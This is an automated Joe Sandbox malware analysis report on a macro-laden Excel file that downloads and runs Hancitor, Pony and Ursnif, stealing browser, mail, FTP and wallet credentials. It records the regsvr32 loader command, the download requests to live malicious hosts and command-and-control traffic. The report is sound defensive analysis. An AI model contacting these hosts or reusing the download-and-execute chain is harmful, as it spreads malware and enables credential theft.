Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report tr_0.xls

Overview

General Information

Sample Name:tr_0.xls
MD5:08f03e9133419730830daa1d5c05f2ea
SHA1:0fbe4abe79048fb25f00e11c3f53b9729ea2019b
SHA256:ee2dc4300f18802a18616e9e5434b2a0d438c819d2229d3724fa266ae881dbf7

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif Hancitor Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped fileDetected unpacking (changes PE section rights)Detected unpacking (overwrites its own PE header)Document exploit detected (creates forbidden files)Document exploit detected (drops PE files)Malicious sample detected (through community Yara rule)Multi AV Scanner detection for domain / URLMulti AV Scanner detection for dropped fileMulti AV Scanner detection for submitted fileOffice document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)System process connects to network (likely due to code injection or exploit)Yara detected UrsnifYara detected HancitorYara detected PonyAllocates memory in foreign processesCreates a COM Internet Explorer objectDocument exploit detected (UrlDownloadToFile)Document exploit detected (process start blacklist hit)Drops PE files to the document folder of the userFound abnormal large hidden Excel 4.0 Macro sheetFound evasive API chain (may stop execution after checking locale)Injects a PE file into a foreign processesMachine Learning detection for dropped fileOffice process drops PE fileTries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Tries to harvest and steal browser information (history, passwords, etc)Tries to harvest and steal ftp login credentialsTries to steal Crypto Currency WalletsTries to steal Mail credentials (via file access)Tries to steal Mail credentials (via file registry)Writes or reads registry keys via WMIWrites registry values via WMIWrites to foreign memory regionsYara detected aPLib compressed binaryAntivirus or Machine Learning detection for unpacked fileChecks if the current process is being debuggedContains functionality locales information (e.g. system language)Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Contains functionality to call native functionsContains functionality to check if a debugger is running (IsDebuggerPresent)Contains functionality to dynamically determine API callsContains functionality to enumerate network sharesContains functionality to execute programs as a different userContains functionality to read the PEBContains functionality which may be used to detect a debugger (GetProcessHeap)Creates a DirectInput object (often for capturing keystrokes)Creates a process in suspended mode (likely to inject code)Creates files inside the system directoryDetected potential crypto functionDownloads executable code via HTTPDrops PE filesEnables debug privilegesExtensive use of GetProcAddress (often used to hide API calls)Found dropped PE file which has not been started or loadedFound evasive API chain checking for process token informationFound potential string decryption / allocating functionsInternet Provider seen in connection with other malwareJA3 SSL client fingerprint seen in connection with other malwareMay sleep (evasive loops) to hinder dynamic analysisOne or more processes crashPE file contains strange resourcesQueries disk information (often used to detect virtual machines)Queries the installation date of WindowsQueries the volume information (name, serial number etc) of a deviceSample execution stops while process was sleeping (likely an evasion)Tries to load missing DLLsUses Microsoft's Enhanced Cryptographic ProviderUses code obfuscation techniques (call, push, ret)Yara detected Xls With Macro 4.0Yara signature match

Classification

Startup

  • System is w10x64_office
  • EXCEL.EXE (PID: 5920 cmdline: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding MD5: D672D26C85AEB9536B9736BF04054969)
    • regsvr32.exe (PID: 4912 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s /i dDdoiBj.ocx MD5: 426E7499F6A7346F0410DEAD0805586B)
      • svchost.exe (PID: 5128 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • cmd.exe (PID: 4256 cmdline: cmd /K MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • svchost.exe (PID: 3708 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
        • BN6D10.tmp (PID: 1940 cmdline: C:\Users\user\AppData\Local\Temp\BN6D10.tmp MD5: 5105430437588F8878DA6957BC8C3119)
      • WerFault.exe (PID: 744 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 696 MD5: 80E91E3C0F5563E4049B62FCAF5D67AC)
  • iexplore.exe (PID: 5712 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5356 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5712 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5752 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5616 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
tr_0.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x142a2:$s1: Excel
  • 0x15301:$s1: Excel
  • 0x3225:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
tr_0.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmpUrsnifdetect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memoryJPCERT/CC Incident Response Group
    • 0xbca:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x89a:$c1: version=%u
    • 0xbd2:$c1: version=%u
    • 0x8ad:$c2: user=%08x%08x%08x%08x
    • 0xbdd:$c2: user=%08x%08x%08x%08x
    • 0x8c3:$c3: server=%u
    • 0xbf3:$c3: server=%u
    • 0x8cd:$c4: id=%u
    • 0xbfd:$c4: id=%u
    • 0x8db:$c7: name=%s
    • 0x8a5:$c8: soft=%u
    • 0xbca:$c8: soft=%u
    0000000D.00000003.549497164.0000000003868000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      0000000D.00000002.711227479.0000000003868000.00000004.00000040.sdmpUrsnifdetect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memoryJPCERT/CC Incident Response Group
      • 0xbca:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
      • 0x89a:$c1: version=%u
      • 0xbd2:$c1: version=%u
      • 0x8ad:$c2: user=%08x%08x%08x%08x
      • 0xbdd:$c2: user=%08x%08x%08x%08x
      • 0x8c3:$c3: server=%u
      • 0xbf3:$c3: server=%u
      • 0x8cd:$c4: id=%u
      • 0xbfd:$c4: id=%u
      • 0x8db:$c7: name=%s
      • 0x8a5:$c8: soft=%u
      • 0xbca:$c8: soft=%u
      00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmpHancitorHancitor Payloadkevoreilly
      • 0x18cf:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
      0000000D.00000003.549218494.0000000003868000.00000004.00000040.sdmpUrsnifdetect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memoryJPCERT/CC Incident Response Group
      • 0xbca:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
      • 0x89a:$c1: version=%u
      • 0xbd2:$c1: version=%u
      • 0x8ad:$c2: user=%08x%08x%08x%08x
      • 0xbdd:$c2: user=%08x%08x%08x%08x
      • 0x8c3:$c3: server=%u
      • 0xbf3:$c3: server=%u
      • 0x8cd:$c4: id=%u
      • 0xbfd:$c4: id=%u
      • 0x8db:$c7: name=%s
      • 0x8a5:$c8: soft=%u
      • 0xbca:$c8: soft=%u
      Click to see the 33 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.svchost.exe.2440000.0.unpackHancitorHancitor Payloadkevoreilly
      • 0xccf:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
      6.3.svchost.exe.5800000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        5.2.regsvr32.exe.46c0000.1.raw.unpackHancitorHancitor Payloadkevoreilly
        • 0x1ccf:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D ...
        13.2.BN6D10.tmp.ef0000.1.unpackUrsnifdetect Ursnif(a.k.a. Dreambot, Gozi, ISFB) in memoryJPCERT/CC Incident Response Group
        • 0x941f:$f1: 56 57 BE 90 C2 EF 00 8D 7D F4 A5 A5 A5
        • 0x90cf:$f2: 35 8F E3 B7 3F
        • 0x90fc:$f3: 35 0A 60 2E 51
        6.3.svchost.exe.5100000.3.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          Click to see the 14 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllAvira: detection malicious, Label: TR/AD.ZDlder.phzid
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpAvira: detection malicious, Label: TR/Crypt.Agent.sxpge
          Source: C:\Users\user\Documents\dDdoiBj.ocxAvira: detection malicious, Label: TR/AD.ZDlder.phzid
          Multi AV Scanner detection for domain / URLShow sources
          Source: mac-rail.comVirustotal: Detection: 6%Perma Link
          Source: gaw.explik.atVirustotal: Detection: 6%Perma Link
          Source: low.explik.atVirustotal: Detection: 8%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllVirustotal: Detection: 47%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllMetadefender: Detection: 13%Perma Link
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllReversingLabs: Detection: 32%
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpVirustotal: Detection: 42%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpMetadefender: Detection: 13%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpReversingLabs: Detection: 54%
          Source: C:\Users\user\Documents\dDdoiBj.ocxVirustotal: Detection: 47%Perma Link
          Source: C:\Users\user\Documents\dDdoiBj.ocxMetadefender: Detection: 13%Perma Link
          Source: C:\Users\user\Documents\dDdoiBj.ocxReversingLabs: Detection: 32%
          Multi AV Scanner detection for submitted fileShow sources
          Source: tr_0.xlsVirustotal: Detection: 20%Perma Link
          Source: tr_0.xlsReversingLabs: Detection: 16%
          Yara detected PonyShow sources
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllJoe Sandbox ML: detected
          Source: C:\Users\user\Documents\dDdoiBj.ocxJoe Sandbox ML: detected
          Source: 13.0.BN6D10.tmp.400000.0.unpackAvira: Label: TR/Crypt.Agent.sxpge
          Source: 13.2.BN6D10.tmp.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.3.svchost.exe.5c00000.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 6.3.svchost.exe.5800000.0.unpackAvira: Label: TR/Kryptik.avp.8
          Source: 13.3.BN6D10.tmp.d80000.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 6.2.svchost.exe.2440000.0.unpackAvira: Label: TR/Dropper.Gen
          Source: 6.2.svchost.exe.10000000.3.unpackAvira: Label: TR/Kryptik.avp.8
          Source: 6.3.svchost.exe.5100000.3.unpackAvira: Label: TR/Patched.Ren.Gen

          Location Tracking:

          barindex
          Yara detected HancitorShow sources
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4912, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5128, type: MEMORY
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02442F20 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442F20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02442FC8 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02442F60 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02442FE8 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442FE8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02442F9E CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,6_2_02442F9E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10007E6C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,6_2_10007E6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10007CB1 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,6_2_10007CB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_100080E0 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,6_2_100080E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_100090E3 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,6_2_100090E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10009DB0 lstrlenA,CryptUnprotectData,LocalFree,6_2_10009DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_100043D4 CryptUnprotectData,LocalFree,6_2_100043D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC01507 NetUserEnum,LocalAlloc,NetApiBufferFree,12_2_0BC01507
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_100068C0 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_100068C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000419E FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000419E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10004DF4 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,6_2_10004DF4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10007241 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10007241
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_10004A84 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,6_2_10004A84
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_1000673C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,6_2_1000673C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC01FD3 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,12_2_0BC01FD3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC03D27 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,12_2_0BC03D27
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0BC06401 FindFirstFileA,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,12_2_0BC06401
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\idb\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\about+newtab\idb\3312185054sbndi_pspte.files\Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\qkye9m34.default\storage\default\moz-extension+++9d374279-4999-47ca-a38c-091873886ffd^userContextId=4294967295\Jump to behavior

          Software Vulnerabilities:

          barindex
          Document exploit detected (creates forbidden files)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\N71PG28V\434[1].dllJump to behavior
          Document exploit detected (drops PE files)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: 434[1].dll.1.drJump to dropped file
          Document exploit detected (UrlDownloadToFile)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2014411 ET TROJAN Fareit/Pony Downloader Checkin 2 192.168.1.102:49708 -> 91.218.231.226:80
          Source: TrafficSnort IDS: 2014411 ET TROJAN Fareit/Pony Downloader Checkin 2 192.168.1.102:49711 -> 91.218.231.226:80
          Creates a COM Internet Explorer objectShow sources
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\BN6D10.tmpKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 14 Jul 2020 09:20:24 GMTContent-Type: application/octet-streamContent-Length: 375808Connection: keep-aliveLast-Modified: Mon, 13 Jul 2020 09:45:24 GMTETag: "5f0c2d34-5bc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 24 0c 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 22 05 00 00 96 00 00 00 00 00 00 b0 33 05 00 00 10 00 00 00 40 05 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 a3 05 00 c8 00 00 00 00 e0 05 00 74 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 50 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 ab 05 00 24 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6f 00 00 00 00 00 00 00 f4 13 05 00 00 10 00 00 00 14 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 b4 0d 00 00 00 30 05 00 00 0e 00 00 00 18 05 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fe 01 00 00 00 40 05 00 00 02 00 00 00 26 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 20 4e 00 00 00 50 05 00 00 50 00 00 00 28 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 33 00 00 00 a0 05 00 00 34 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 07 00 00 00 e0 05 00 00 08 00 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 06 00 00 00 f0 05 00 00 08 00 00 00 b4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
          Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_02442250 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,6_2_02442250
          Source: global trafficHTTP traffic detected: GET /434.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mac-rail.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /webstore/kForBNOkuld/PMlfu1v0euSE_2/BxUhIJ7s_2Bzsa3aIvWWg/Plua7gYt6_2FPIim/H4JsNRqeFEmy2x5/kCDFDTJH_2B7v1zAt2/t_2By1xSF/iMqjoVQSyKnC4pmTEnMd/1Nda0IQeuWzmdIehoi2/vu8izqslTvsQLEp4RIGngf/VgE_2FejxR85f/5NpXiZBQ/xEFQXgMm80LfNjSS6LprzNc/_2FfZF02zj/WlTRAb5yIVLFDvRRQ/LisJTjFikyCJ/yXE4xWGBJrB/Twnb9Gc_0A_0Dt/NJP19L6X6zblGIbP5vDvW/9wRCcLW0TAdw4379/wFyXjYIF/T HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gaw.explik.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /webstore/Wn2lrwDcfADSyX9Xa/bQ9IeTtb06T_/2Fyc5Du3a5C/Lbn9mkIxBLN4KS/0RiYslQln2uSb526_2FZm/fNkDBZePuZrATiQn/27jcpwDh1RA4upt/WsONFtTjnt3E_2FciB/BuyJhj2lU/e7KhPQjbhtvsi_2BPEBm/dqg6KCxr123lryjC_2B/rsW0LaJL29JZD0HTL3n3by/0dLhDac4FZAm6/Cll4ZY31/36smpDyOWwQEQIQyBeyPrxB/AWWgeCY_2F/D0kB9OWlNSI7FBMD_/0A_0D0wKzQLR/qdmLCTbzmUv/6Bzg_2F16y0cMp/8eIeLRZDfPXuShbQ/W HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: gaw.explik.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /webstore/AOTtVIIFCyCl/rwHdKEZcyQz/zhsxqwtz0yJYCb/7wUwfdl67qUD5HOfnxeCy/4K2RFYcLg8x3JVwy/HHqS5FYbT5LR812/3drnDFI56W2PMZ4T3B/Z2k1S5bLG/ggEuoPBYFVY9Ucp4X2wJ/fxiLjJeTe5E6Iv80mkC/IkwsZL_2F_2BeRu3yeL0kw/Iz7Rtfj8FmL6o/19PNHBMl/ZMvH4neYIcicG6MljnDN_2B/AEobh9WXfv/6OZ5eYjqbttNmOt00/h6KBLnTcHE_0/A_0DXlYD3rU/jMSlmxbL3fthS_/2BwqQVILC1SW2R8JiDYGM/FJdHfBp4_2FZn6db/50iMd53h_2BkoMJ/H HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: low.explik.atConnection: Keep-Alive
          Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x3531f250,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
          Source: msapplication.xml1.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3531f250,0x01d659c0</date><accdate>0x35348e01,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
          Source: msapplication.xml6.19.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
